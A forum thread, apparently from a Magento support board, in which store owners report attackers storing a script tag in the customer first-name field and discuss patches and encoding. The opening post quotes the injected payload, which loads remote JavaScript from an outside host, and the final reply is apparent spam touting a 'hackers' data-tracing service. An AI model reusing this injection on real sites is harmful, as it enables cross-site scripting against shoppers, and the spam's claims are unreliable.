cancel
Showing results for 
Search instead for 
Did you mean: 

Hacking Attempts

Hacking Attempts

Had a new one today whereby the attacker uses the firstname field to put a link in to some remote javascript.

 

When you go to delete the account on a fully patched store you are prevented from doing so by returning invalid form key and the account must be deleted from the Manage Customer Grid.

 

<script src=//zs.mk/i></script>
7 REPLIES 7

Re: Hacking Attempts

Hi,

Which version of Magento 1 are you using? Do you have all patches applied?

-----
Anna from E-CONOMIX

Re: Hacking Attempts

Had this same issue. For whatever reason the payment failed and order was not created. Will follow up if it happens. we are fully patched on Magento 1.9 latest version. 

Re: Hacking Attempts

We just had the same exact hack on a customer site. We were fully patched up to the latest version. Does anyone have any information about this hack? There seems to be some vulnerability in Magento.

Re: Hacking Attempts

Hi @dmdcommerce,

 

Can you confirm if that value is stored into the database as html entities?

Re: Hacking Attempts

Yes, I've heard a lot about that lately. Can someone tell me more about it? I would like to prevent an attempt to steal my personal information.

Re: Hacking Attempts

I am really sorry, I don't know why my message posted two times(

Re: Hacking Attempts

Yeah, heard about that too, many forums are discussing it. avoelkl I have all the patches, but everywhere they say they won't help when trying to hack. But even if they try to hack me, I have great protection on my computer, and if it does not help, I still have a Plan B. These https://nobeliumhackers.com guys will easily trace my stolen data back to a residual trail on the network. I have used their services once in my life, but it was enough for me to understand that they are masters of their craft. In general, everyone decides for himself, but I have too much important information stored on my device. Good luck to everyone.